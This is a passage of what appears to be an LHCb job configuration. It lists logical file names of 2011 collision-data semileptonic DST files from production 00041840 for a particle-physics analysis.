'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0001/00041840_00011286_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0006/00041840_00061916_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0003/00041840_00033338_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0005/00041840_00050403_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0006/00041840_00064455_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0000/00041840_00004831_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0006/00041840_00062328_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0005/00041840_00054877_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0002/00041840_00025800_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0005/00041840_00054561_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0001/00041840_00013836_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0000/00041840_00009030_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0006/00041840_00062773_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0004/00041840_00041427_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0004/00041840_00041413_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0001/00041840_00013507_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0002/00041840_00029669_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0000/00041840_00004140_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0004/00041840_00044275_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0002/00041840_00021823_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0002/00041840_00021417_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0002/00041840_00021540_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0001/00041840_00014259_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0003/00041840_00035490_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0000/00041840_00005113_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0005/00041840_00055424_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0004/00041840_00049025_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0002/00041840_00027072_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0004/00041840_00042559_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0001/00041840_00016352_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0005/00041840_00053068_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0001/00041840_00015609_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0004/00041840_00042171_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0001/00041840_00016738_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0006/00041840_00065394_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0005/00041840_00055393_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0002/00041840_00028054_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0003/00041840_00032107_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0005/00041840_00053069_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0004/00041840_00049598_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0005/00041840_00051649_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0000/00041840_00002725_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0004/00041840_00048137_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0003/00041840_00036246_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0003/00041840_00033497_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0006/00041840_00063634_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0005/00041840_00059483_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0000/00041840_00006793_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0005/00041840_00058371_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0005/00041840_00056876_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0001/00041840_00015950_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0002/00041840_00022609_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0004/00041840_00043675_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0005/00041840_00054910_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0004/00041840_00040751_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0004/00041840_00046657_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0002/00041840_00021929_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0000/00041840_00000978_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0006/00041840_00065615_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0003/00041840_00036645_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0006/00041840_00069318_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0006/00041840_00062682_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0001/00041840_00013299_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0003/00041840_00038068_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0006/00041840_00067906_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0006/00041840_00068758_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0006/00041840_00066709_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0004/00041840_00049037_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0004/00041840_00040407_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0003/00041840_00035355_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0003/00041840_00032176_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0005/00041840_00056875_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0000/00041840_00002511_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0003/00041840_00036015_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0001/00041840_00015973_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0005/00041840_00055770_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0000/00041840_00003817_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0003/00041840_00030620_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0003/00041840_00032980_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0001/00041840_00010345_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0002/00041840_00028001_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0004/00041840_00046185_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0002/00041840_00020512_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0003/00041840_00031641_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0006/00041840_00069100_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0006/00041840_00067268_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0001/00041840_00019732_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0002/00041840_00027317_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0000/00041840_00002439_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0006/00041840_00063190_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0003/00041840_00037860_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0006/00041840_00060678_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0005/00041840_00055486_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0001/00041840_00012895_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0002/00041840_00021931_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0003/00041840_00036502_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0005/00041840_00053535_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0002/00041840_00024802_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0004/00041840_00048390_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0001/00041840_00014116_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0004/00041840_00043020_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0002/00041840_00029773_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0000/00041840_00006152_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0005/00041840_00056753_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0006/00041840_00064196_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0003/00041840_00037151_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0005/00041840_00058914_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0005/00041840_00054786_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0000/00041840_00007480_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0006/00041840_00065614_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0002/00041840_00023098_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0002/00041840_00022809_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0000/00041840_00000773_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0005/00041840_00057338_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0006/00041840_00063017_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0004/00041840_00040595_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0005/00041840_00050958_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0001/00041840_00014567_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0005/00041840_00055800_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0000/00041840_00003071_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0003/00041840_00039765_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0001/00041840_00019870_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0005/00041840_00052865_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0004/00041840_00044449_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0003/00041840_00032337_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0006/00041840_00061360_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0003/00041840_00033265_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0001/00041840_00018444_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0004/00041840_00046328_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0001/00041840_00016880_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0006/00041840_00064159_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0002/00041840_00029514_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0005/00041840_00054710_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0001/00041840_00010436_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0000/00041840_00004910_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0004/00041840_00045047_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0003/00041840_00037977_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0006/00041840_00069227_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0000/00041840_00001747_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0003/00041840_00036651_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0006/00041840_00064333_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0002/00041840_00026998_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0006/00041840_00064165_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0005/00041840_00053987_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0000/00041840_00003831_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0001/00041840_00019182_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0005/00041840_00059619_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0002/00041840_00026410_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0000/00041840_00004399_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0006/00041840_00065079_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0003/00041840_00037411_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0005/00041840_00050533_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0000/00041840_00006103_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0003/00041840_00037199_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0006/00041840_00062446_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0001/00041840_00018744_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0005/00041840_00054156_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0004/00041840_00042869_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0006/00041840_00060789_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0002/00041840_00024540_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0005/00041840_00059084_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0006/00041840_00062470_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0005/00041840_00059681_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0006/00041840_00069245_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0003/00041840_00038841_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0004/00041840_00040951_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0001/00041840_00018922_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0002/00041840_00020958_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0005/00041840_00057484_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0004/00041840_00042561_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0005/00041840_00055773_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0003/00041840_00036732_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0004/00041840_00048974_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0006/00041840_00061164_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0000/00041840_00000028_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0002/00041840_00022125_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0001/00041840_00013046_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0002/00041840_00027444_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0005/00041840_00058195_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0000/00041840_00009891_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0000/00041840_00003799_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0004/00041840_00045508_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0002/00041840_00024754_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0005/00041840_00057323_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0001/00041840_00016912_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0001/00041840_00014140_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0000/00041840_00007549_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0001/00041840_00016060_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0005/00041840_00057753_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0003/00041840_00030947_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0001/00041840_00013837_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0000/00041840_00003686_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0003/00041840_00038930_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0000/00041840_00003309_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0002/00041840_00028648_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0001/00041840_00019059_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0004/00041840_00049790_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0005/00041840_00058200_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0001/00041840_00017798_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0004/00041840_00043481_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0005/00041840_00057410_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0005/00041840_00053316_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0003/00041840_00039886_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0006/00041840_00063950_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0005/00041840_00057701_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0002/00041840_00029668_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0004/00041840_00046325_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0003/00041840_00030047_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0002/00041840_00027275_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0006/00041840_00065784_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0000/00041840_00009687_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0002/00041840_00026571_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0001/00041840_00012641_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0005/00041840_00055527_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0003/00041840_00032692_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0004/00041840_00042086_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0000/00041840_00002946_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0006/00041840_00067271_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0002/00041840_00023807_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0002/00041840_00024050_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0006/00041840_00061953_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0002/00041840_00027493_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0006/00041840_00065443_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0000/00041840_00001410_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0002/00041840_00023635_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0003/00041840_00039028_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0006/00041840_00064776_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0004/00041840_00040152_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0001/00041840_00013851_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0001/00041840_00019483_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0006/00041840_00069332_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0006/00041840_00065147_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0000/00041840_00009031_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0005/00041840_00050634_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0002/00041840_00027191_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0005/00041840_00055468_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0003/00041840_00030190_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0006/00041840_00064456_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0000/00041840_00003845_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0006/00041840_00063803_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0006/00041840_00062803_1.semileptonic.dst',
